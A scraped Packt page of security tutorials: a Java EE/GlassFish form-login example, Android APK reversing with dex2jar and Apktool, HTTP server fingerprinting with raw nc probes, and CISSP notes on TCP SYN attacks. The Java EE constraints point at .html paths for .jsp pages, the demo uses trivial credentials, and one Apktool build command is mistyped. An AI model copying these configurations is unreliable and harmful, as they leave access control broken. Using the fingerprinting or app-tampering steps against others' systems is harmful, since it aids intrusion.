Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-developing-secure-java-ee-applications-glassfish
Packt
31 May 2010
14 min read
Save for later

Developing Secure Java EE Applications in GlassFish

Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In course of the article, we will cover following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container Read Designing Secure Java EE Applications in GlassFish here. Developing the Presentation layer The Presentation layer is the closest layer to end users when we are developing applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed in the following table. In the table you can see that different JSP files are categorized into different directories to make the security description easier. Element Name Element Description Index.jsp Application entry point. It has some links to functional JSP pages like toMilli.jsp and so on. auth/login.html This file presents a custom login page to user when they try to access a restricted resource. This file is placed inside auth directory of the web application. auth/logout.jsp Logging users out of the system after their work is finished. auth/loginError.html Unsuccessful login attempt redirect users to this page. This file is placed inside auth directory of the web application jsp/toInch.jsp Converts given length to inch, it is only available for managers. jsp/toMilli.jsp Converts given length to millimeter, this page is available to any employee. jsp/toCenti.jsp Converts given length to centimeter, this functionality is available for everyone. Converter Servlet Receives the request and invoke the session bean to perform the conversion and returns back the value to user. auth/accessRestricted.html An error page for error 401 which happens when authorization fails. Deployment Descriptors The deployment descriptors which we describe the security constraints over resources we want to protect. Now that our application building blocks are identified we can start implementing them to complete the application. Before anything else let's implement JSP files that provides the conversion GUI. The directory layout and content of the Web module is shown in the following figure: Implementing the Conversion GUI In our application we have an index.jsp file that acts as a gateway to the entire system and is shown in the following listing: <html> <head><title>Select A conversion</title></head> <body><h1>Select A conversion</h1> <a href="auth/login.html">Login</a> <br/> <a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/> <a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/> <a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/> <a href="auth/logout.jsp">Logout</a> </body> </html> Implementing the Converter servlet The Converter servlet receives the conversion value and method from JSP files and calls the corresponding method of a session bean to perform the actual conversion. The following listing shows the Converter servlet content: @WebServlet(name="Converter", urlPatterns={"/Converter"}) public class Converter extends HttpServlet { @EJB private ConversionLocal conversionBean; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { System.out.println("POST"); response.setContentType("text/html;charset=UTF-8"); PrintWriter out = response.getWriter(); try{ int valueToconvert = Integer.parseInt(request.getParameter("meterValue")); String method = request.getParameter("method"); out.print("<hr/> <center><h2>Conversion Result is: "); if (method.equalsIgnoreCase("toMilli")) { out.print(conversionBean.toMilimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toCenti")) { out.print(conversionBean.toCentimeter(valueToconvert)); } else if (method.equalsIgnoreCase("toInch")) { out.print(conversionBean.toInch(valueToconvert)); } out.print("</h2></center>"); }catch (AccessLocalException ale) { response.sendError(401); }finally { out.close(); } } } Starting from the beginning we are using annotation to configure the servlet mapping and servlet name instead of using the deployment descriptor for it. Then we use dependency injection to inject an instance of Conversion session bean into the servlet and decide which one of its methods we should invoke based on the conversion type that the caller JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. The following figure shows what the result of invocation could look like: Each servlet needs some description elements in the deployment descriptor or included as deployment descriptor elements. Implementing the conversion JSP files is the last step in implementing the functional pieces. In the following listing you can see content of the toMilli.jsp file. <html> <head><title>Convert To Millimeter</title></head> <body><h1>Convert To Millimeter</h1> <form method=POST action="../Converter">Enter Value to Convert: <input name=meterValue> <input type="hidden" name="method" value="toMilli"> <input type="submit" value="Submit" /> </form> </body> </html> The toCenti.jsp and toInch.jsp files look the same except for the descriptive content and the value of the hidden parameter which will be toCenti and toInch respectively for toCenti.jsp and toInch.jsp. Now we are finished with the functional parts of the Web layer; we just need to implement the required GUI for security measures. Implementing the authentication frontend For the authentication, we should use a custom login page to have a unified look and feel in the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need to implement a login page and an error page to redirect the users to that page in case authentication fails. Implementing authentication requires us to go through the following steps: Implementing login.html and loginError.html Including security description in the web.xml and sun-web.xml or sun-application.xml Implementing a login page In FORM authentication we implement our own login form to collect username and password and we then pass them to the container for authentication. We should let the container know which field is username and which field is password by using standard names for these fields. The username field is j_username and the password field is j_password. To pass these fields to container for authentication we should use j_security_check as the form action. When we are posting to j_security_check the servlet container takes action and authenticates the included j_username and j_password against the configured realm. The listing below shows login.html content. <form method="POST" action="j_security_check"> Username: <input type="text" name="j_username"><br /> Password: <input type="password" name="j_password"><br /> <br /> <input type="submit" value="Login"> <input type="reset" value="Reset"> </form> The following figure shows the login page which is shown when an unauthenticated user tries to access a restricted resource: Implementing a logout page A user may need to log out of our system after they're finished using it. So we need to implement a logout page. The following listing shows the logout.jsp file: <% session.invalidate(); %> <body> <center> <h1>Logout</h1> You have successfully logged out. </center> </body> Implementing a login error page And now we should implement LoginError.html, an authentication error page to inform user about its authentication failure. <html> <body> <h2>A Login Error Occurred</h2> Please click <a href="login.html">here</a> for another try. </body> </html> Implementing an access restricted page When an authenticated user with no required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users we should either map this exception to an error page or we should catch the exception, log the event for audition purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web pages with meaningful descriptions using the web.xml deployment descriptor. You will see which configuration elements we will use to do the mapping. The following snippet shows AccessRestricted.html file: <body> <center> <p>You need to login to access the requested resource. To login go to <a href="auth/login.html">Login Page</a></p></center> </body> Configuring deployment descriptors So far we have implemented required files for the FORM-based authentication and we only need to include required descriptions in the web.xml file. Looking back at the application requirement definitions, we see that anyone can use meter to centimeter conversion functionality and any other functionality that requires the user to login. We use three different HTML pages for different types of conversion. We do not need any constraint on toCentimeter.html therefore we do not need to include any definition for it. Per application description, any employee can access the toMilli.jsp page. Defining security constraint for this page is shown in the following listing: <security-constraint> <display-name>You should be an employee</display-name> <web-resource-collection> <web-resource-name>all</web-resource-name> <description/> <url-pattern>/jsp/toMillimeter.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>employee_role</role-name> </auth-constraint> </security-constraint> We should put enough constraints on the toInch.jsp page so that only managers can access the page. The listing included below shows the security constraint definition for this page. <security-constraint> <display-name>You should be a manager</display-name> <web-resource-collection> <web-resource-name>Inch</web-resource-name> <description/> <url-pattern>/jsp/toInch.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <description/> <role-name>manager_role</role-name> </auth-constraint> </security-constraint> Finally we need to define any role we used in the deployment descriptor. The following snippet shows how we define these roles in the web.xml page. <security-role> <description/> <role-name>manager_role</role-name> </security-role> <security-role> <description/> <role-name>employee_role</role-name> </security-role> Looking back at the application requirements, we need to define data constraint and ensure that username and passwords provided by our users are safe during transmission. The following listing shows how we can define the data constraint on the login.html page. <security-constraint> <display-name>Login page Protection</display-name> <web-resource-collection> <web-resource-name>Authentication</web-resource-name> <description/> <url-pattern>/auth/login.html</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <user-data-constraint> <description/> <transport-guarantee>CONFIDENTIAL</transport-guarantee> </user-data-constraint> </security-constraint> One more step and our web.xml file will be complete. In this step we define an error page for HTML 401 error code. This error code means that application server is unable to perform the requested action due to negative authorization result. The following snippet shows the required elements to define this error page. <error-page> <error-code>401</error-code> <location>AccessRestricted.html</location> </error-page> Now that we are finished with declaring the security we can create the conversion pages and after creating these pages we can start with Business layer and its security requirements. Specifying the security realm Up to this point we have defined all the constraints that our application requires but we still need to follow one more step to complete the application's security configuration. The last step is specifying the security realm and authentication. We should specify the FORM authentication and per-application description; authentication must happen against the company-wide LDAP server. Here we are going to use the LDAP security realm LDAPRealm. We need to import a new LDIF file into our LDAP server, which contains groups and users definition required for this article. To import the file we can use the following command, assuming that you downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and you have it extracted. import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin --bindPassword admin --trustAll --noPropertiesFile The following table show users and groups that are defined inside the users.ldif file. Username and password Group membership james/james manager, employee meera/meera employee We used OpenDS for the realm data storage and it had two users, one in the employee group and the other one in the manager group. To configure the authentication realm we need to include the following snippet in the web.xml file. <login-config> <auth-method>FORM</auth-method> <realm-name>LDAPRealm</realm-name> <form-login-config> <form-login-page>/auth/login.html</form-login-page> <form-error-page>/auth/loginError.html</form-error-page> </form-login-config> </login-config> If we look at our Web and EJB modules as separate modules we must specify the role mappings for each module separately using the GlassFish deployment descriptors, which are sun-web.xml and sun-ejb.xml. But we are going to bundle our modules as an Enterprise Application Archive (EAR) file so we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use that definitions. The following listing shows roles and groups mapping in the sun-application.xml file. <sun-application> <security-role-mapping> <role-name>manager_role</role-name> <group-name>manager</group-name> </security-role-mapping> <security-role-mapping> <role-name>employee_role</role-name> <group-name>employee</group-name> </security-role-mapping> <realm>LDAPRealm</realm> </sun-application> The security-role-mapping element we used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You should have noticed that we have a realm element in addition to role mapping elements. We can use the realm element of the sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately. Summary In this article series, we covered the following topics: Analyzing Java EE application security requirements Including security requirements in Java EE application design Developing secure Business layer using EJBs Developing secure Presentation layer using JSP and Servlets Configuring deployment descriptors of Java EE applications Specifying security realm for enterprise applications Developing secure application client module Configuring Application Client Container We learnt how to develop a secure Java EE application with all standard modules including Web, EJB, and application client modules.
Read more
  • 0
  • 0
  • 5734

article-image-reversing-android-applications
Packt
20 Mar 2014
8 min read
Save for later

Reversing Android Applications

Packt
20 Mar 2014
8 min read
(For more resources related to this topic, see here.) Android application teardown An Android application is an archive file of the data and resource files created while developing the application. The extension of an Android application is .apk, meaning application package, which includes the following files and folders in most cases: Classes.dex (file) AndroidManifest.xml (file) META-INF (folder) resources.arsc (file) res (folder) assets (folder) lib (folder) In order to verify this, we could simply unzip the application using any archive manager application, such as 7zip, WinRAR, or any preferred application. On Linux or Mac, we could simply use the unzip command in order to show the contents of the archive package, as shown in the following screenshot: Here, we have used the -l (list) flag in order to simply show the contents of the archive package instead of extracting it. We could also use the file command in order to see whether it is a valid archive package. An Android application consists of various components, which together create the working application. These components are Activities, Services, Broadcast Receivers, Content providers, and Shared Preferences. Before proceeding, let's have a quick walkthrough of what these different components are all about: Activities: These are the visual screens which a user could interact with. These may include buttons, images, TextView, or any other visual component. Services: These are the Android components which run in the background and carry out specific tasks specified by the developer. These tasks may include anything from downloading a file over HTTP to playing music in the background. Broadcast Receivers: These are the receivers in the Android application that listen to the incoming broadcast messages by the Android system, or by other applications present in the device. Once they receive a broadcast message, a particular action could be triggered depending on the predefined conditions. The conditions could range from receiving an SMS, an incoming phone call, a change in the power supply, and so on. Shared Preferences: These are used by an application in order to save small sets of data for the application. This data is stored inside a folder named shared_prefs. These small datasets may include name value pairs such as the user's score in a game and login credentials. Storing sensitive information in shared preferences is not recommended, as they may fall vulnerable to data stealing and leakage. Intents: These are the components which are used to bind two or more different Android components together. Intents could be used to perform a variety of tasks, such as starting an action, switching activities, and starting services. Content Providers: These are used to provide access to a structured set of data to be used by the application. An application can access and query its own data or the data stored in the phone using the Content Providers. Now that we know of the Android application internals and what an application is composed of, we can move on to reversing an Android application. That is getting the readable source code and other data sources when we just have the .apk file with us. Reversing an Android application As we discussed earlier, that Android applications are simply an archive file of data and resources. Even then, we can't simply unzip the archive package (.apk) and get the readable sources. For these scenarios, we have to rely on tools that will convert the byte code (as in classes.dex) into readable source code. One of the approaches to convert byte codes to readable files is using a tool called dex2jar. The .dex file is the converted Java bytecode to Dalvik bytecode, making it optimized and efficient for mobile platforms. This free tool simply converts the .dex file present in the Android application to a corresponding .jar file. Please follow the ensuing steps: Download the dex2jar tool from https://code.google.com/p/dex2jar/. Now we can use it to run against our application's .dex file and convert to .jar format. Now, all we need to do is go to the command prompt and navigate to the folder where dex2jar is located. Next, we need to run the d2j-dex2jar.bat file (on Windows) or the d2j-dex2jar.sh file (on Linux/Mac) and provide the application name and path as the argument. Here in the argument, we could simply use the .apk file, or we could even unzip the .apk file and then pass the classes.dex file instead, as shown in the following screenshot: As we can see in the preceding screenshot, dex2jar has successfully converted the .dex file of the application to a .jar file named helloworld-dex2jar.jar. Now, we can simply open this .jar file in any Java graphical viewer such as JD-GUI, which can be downloaded from its official website at http://jd.benow.ca/. Once we download and install JD-GUI, we could now go ahead and open it. It will look like the one shown in the following screenshot: Here, we could now open up the converted .jar file from the earlier step and see all the Java source code in JD-GUI. To open a .jar file, we could simply navigate to File | Open. In the right-hand side pane, we can see the Java sources and all the methods of the Android application. Note that the recompilation process will give you an approximate version of the original Java source code. This won't matter in most cases; however, in some cases, you might see that some of the code is missing from the converted .jar file. Also, if the application developer is using some protections against decompilations such as proguard and dex2jar, when we decompile the application using dex2jar or Apktool, we won't be seeing the exact source code; instead, we will see a bunch of different source files, which won't be the exact representation of the original source code. Using Apktool to reverse an Android application Another way of reversing an Android application is converting the .dex file to smali files. A smali is a file format whose syntax is similar to a language known as Jasmine. We won't be going in depth into the smali file format as of now. For more information, take a look at the online wiki at https://code.google.com/p/smali/wiki/ in order to get an in-depth understanding of smali. Once we have downloaded Apktool and configured it, we are all set to go further. The main advantage of Apktool over JD-GUI is that it is bidirectional. This means if you decompile an application and modify it, and then recompile it back using Apktool, it will recompile perfectly and will generate a new .apk file. However, dex2jar and JD-GUI won't be able to do this similar functionality, as it gives an approximate code and not the exact code. So, in order to decompile an application using Apktool, all we need to do is to pass in the .apk filename along with the Apktool binary. Once decompiled, Apktool will create a new folder with the application name in which all of the files will be stored. To decompile, we will simply go ahead and use apktool d [app-name].apk. Here, the -d flag stands for decompilation. In the following screenshot, we can see an app being decompiled using Apktool: Now, if we go inside the smali folder, we will see a bunch of different smali files, which will contain the code of the Java classes that were written while developing the application. Here, we can also open up a file, change the values, and use Apktool to build it back again. To build a modified application from smali, we will use the b (build) flag in Apktool. apktool d [decompiled folder name] [target-app-name].apk However, in order to decompile, modify, and recompile applications, I would personally recommend using another tool called Virtuous Ten Studio (VTS). This tool offers similar functionalities as Apktool, with the only difference that VTS presents it in a nice graphical interface, which is relatively easy to use. The only limitation for this tool is it runs natively only on the Windows environment. We could go ahead and download VTS from the official download link, http://www.virtuous-ten-studio.com/. The following is a screenshot of the application decompiling the same project: Summary In this article, we covered some of the methods and techniques that are used to reverse the Android applications. Resources for Article: Further resources on this subject: Android Native Application API [Article] Introducing an Android platform [Article] Animating Properties and Tweening Pages in Android 3-0 [Article]
Read more
  • 0
  • 0
  • 5700

article-image-blocking-common-attacks-using-modsecurity-25-part-1
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited: The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted. The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file. Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities. Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data. HTTP fingerprinting Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play. We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools: httprint One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD. httprecon This is a newer tool which was first released in 2007. It is still in active development. Runs on Windows. Let's first run httprecon against a standard Apache 2.2 server: And now let's run httprint against the same server and see what happens: As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server! You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/. Tip If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname. The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software. How HTTP fingerprinting works There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones. Server banner The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner: # Change the server banner to MyServer 1.0ServerTokens FullSecServerSignature "MyServer 1.0" Response header The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges. HTTP protocol responses An other way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server. Issuing an HTTP DELETE request The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page? Here is a DELETE request issued to our Apache server: $ nc bytelayer.com 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedDate: Mon, 27 Apr 2009 09:10:49 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Allow: GET,HEAD,POST,OPTIONS,TRACEContent-Length: 303Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method DELETE is not allowed for the URL /index.html.</p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL/index.html. Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net: $ nc www.iis.net 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedAllow: GET, HEAD, OPTIONS, TRACEContent-Type: text/htmlServer: Microsoft-IIS/7.0Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35GMT; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Mon, 27 Apr 2009 09:22:34 GMTConnection: closeContent-Length: 1293<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html ><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>405 - HTTP verb used to access this page is not allowed.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;}h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;}h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;fontfamily:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style>< /head><body><div id="header"><h1>Server Error</h1></div><div id="content"><div class="content-container"><fieldset> <h2>405 - HTTP verb used to access this page is not allowed.</h2> <h3>The page you are looking for cannot be displayed because aninvalid method (HTTP verb) was used to attempt access.</h3> </fieldset></div></div></body></html> The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0. (We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated from IIS carries the same HTTP error code, 405; however there are many subtle differences in the way the response is generated. Here are just a few: IIS uses spaces in between method names in the comma separated list for the Allow field, whereas Apache does not The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body Bad HTTP version numbers A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued: $ nc bytelayer.com 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestDate: Mon, 27 Apr 2009 09:36:10 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Content-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could notunderstand.<br /></p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request Error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand. Now let's see what IIS does: $ nc www.iis.net 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 27 Apr 2009 09:38:37 GMTConnection: closeContent-Length: 334<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=usascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML> We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol would also require this header to be sent, and the error message reflects this fact.
Read more
  • 0
  • 0
  • 5656
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-telecommunications-and-network-security-concepts-cissp-exam
Packt
28 Oct 2009
5 min read
Save for later

Telecommunications and Network Security Concepts for CISSP Exam

Packt
28 Oct 2009
5 min read
Transport layer The transport layer in the TCP/IP model does two things: it packages the data given out by applications to a format that is suitable for transport over the network, and it unpacks the data received from the network to a format suitable for applications. The process of packaging the data packets received from the applications is known as encapsulation. The output of such a process is known as datagram. Similarly, the process of unpacking the datagram received from the network is known as abstraction A transport section in a protocol stack carries the information that is in the form of datagrams, Frames and Bits. Transport layer protocols There are many transport layer protocols that carry the transport layer functions. The most important ones are: Transmission Control Protocol (TCP): It is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. User Datagram Protocol (UDP): This protocol is similar to TCP, but is connectionless. A connection-oriented protocol is a protocol that guarantees delivery of datagram (packets) to the destination application by way of a suitable mechanism. For example, a three-way handshake syn, syn-ack, ack in TCP. The reliability of datagram delivery of such protocol is high. A protocol that does not guarantee the delivery of datagram, or packets, to the destination is known as connectionless protocol. These protocols use only one-way communication. The speed of the datagram's delivery by such protocols is high. Other transport layer protocols are as follows: Sequenced Packet eXchange (SPX): SPX is a part of the IPX/SPX protocol suit and used in Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol. Stream Control Transmission Protocol (SCTP): It is a connection-oriented protocol similar to TCP, but provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems. Appletalk Transaction Protocol (ATP): It is a proprietary protocol developed for Apple Macintosh computers. Datagram Congestion Control Protocol (DCCP): As the name implies, it is a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network. Fiber Channel Protocol (FCP): This protocol is used in high-speed networking such as Gigabit networking. One of its prominent applications is Storage Area Network (SAN). SAN is network architecture that's used for attaching remote storage devices such as tape drives, disk arrays, and so on to the local server. This facilitates the use of storage devices as if they were local devices. In the following sections we'll review the most important protocols—TCP and UDP. Transmission Control Protocol (TCP) TCP is a connection-oriented protocol that is widely used in Internet communications. As the name implies, a protocol has two primary functions. The primary function of TCP is the transmission of datagram between applications, while the secondary function is related to controls that are necessary for ensuring reliable transmissions. Protocol / Service Transmission Control Protocol (TCP) Layer(s) TCP works in the transport layer of the TCP/IP model Applications Applications where the delivery needs to be assured such as email, World Wide Web (WWW), file transfer, and so on use TCP for transmission Threats Service disruption Vulnerabilities Half-open connections Attacks Denial-of- service attacks such as TCP SYN attacks Connection hijacking such as IP Spoofing attacks Countermeasures Syn cookies Cryptographic solutions   A half-open connection is a vulnerability in TCP implementation. TCP uses a three-way handshake to establish or terminate connections. Refer to the following illustration: In a three-way handshake, first the client (workstation) sends a request to the server (www.some_website.com). This is known as an SYN request. The server acknowledges the request by sending SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery. If the client does not send the final ACK, then the connection is known as half-open. Since the server has created a buffer for that connection, certain amounts of memory or server resources are consumed. If thousands of such half-open connections are created maliciously, the server resources may be completely consumed resulting in a denial-of-service to legitimate requests. TCP SYN attacks are technically establishing thousands of half-open connections to consume the server resources. Two actions can be taken by an attacker. The attacker, or malicious software, will send thousands of SYN to the server and withhold the ACK. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, in a span of time the entire resources will be consumed. This will result in a denial-of-service. If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing. SYN attacks, such as SYN flooding and SYN spoofing, can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. The server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, which it sends as SYN-ACK. When the server receives an ACK, it checks the details and creates the connection. A cookie is a piece of information, usually in a form of text file, sent by the server to client. Cookies are generally stored on a client's computer and are used for purposes such as authentication, session tracking, and management. User Datagram Protocol (UDP) UDP is a connectionless protocol similar to TCP. However, UDP does not provide delivery guarantee of data packets.  
Read more
  • 0
  • 0
  • 4517

article-image-mobile-and-social-threats-you-should-know-about
Packt
17 Sep 2013
8 min read
Save for later

Mobile and Social - the Threats You Should Know About

Packt
17 Sep 2013
8 min read
(For more resources related to this topic, see here.) A prediction of the future (and the lottery numbers for next week) scams Security threats, such as malware, are starting to be manifested on mobile devices, as we are learning that mobile devices are not immune to virus, malware, and other attacks. As PCs are increasingly being replaced by the use of mobile devices, the incidence of new attacks against mobile devices is growing. The user has to take precautions to protect their mobile devices just as they would protect their PC. One major type of mobile cybercrime is the unsolicited text message that captures personal details. Another type of cybercrime involves an infected phone that sends out an SMS message that results in excess connectivity charges. Mobile threats are on the rise according to the Symantec Report of 2012; 31 percent of all mobile users have received an SMS from someone that they didn't know. An example is where the user receives an SMS message that includes a link or phone number. This technique is used to install malware onto your mobile device. Also, these techniques are an attempt to hoax you into disclosing personal or private data. In 2012, Symantec released a new cybercrime report. They concluded that countries like Russia, China, and South Africa have the highest cybercrime incidents. Their rate of exploitation ranges from 80 to 92 percent. You can find this report at http://now-static.norton.com/now/en/pu/images/Promotions/2012/cybercrimeReport/2012_Norton_Cybercrime_Report_Master_FINAL_050912.pdf. Malware The most common type of threat is known as malware . It is short for malicious software. Malware is used or created by attackers to disrupt many types of computer operations, collect sensitive information, or gain access to a private mobile device/computer. It includes worms, 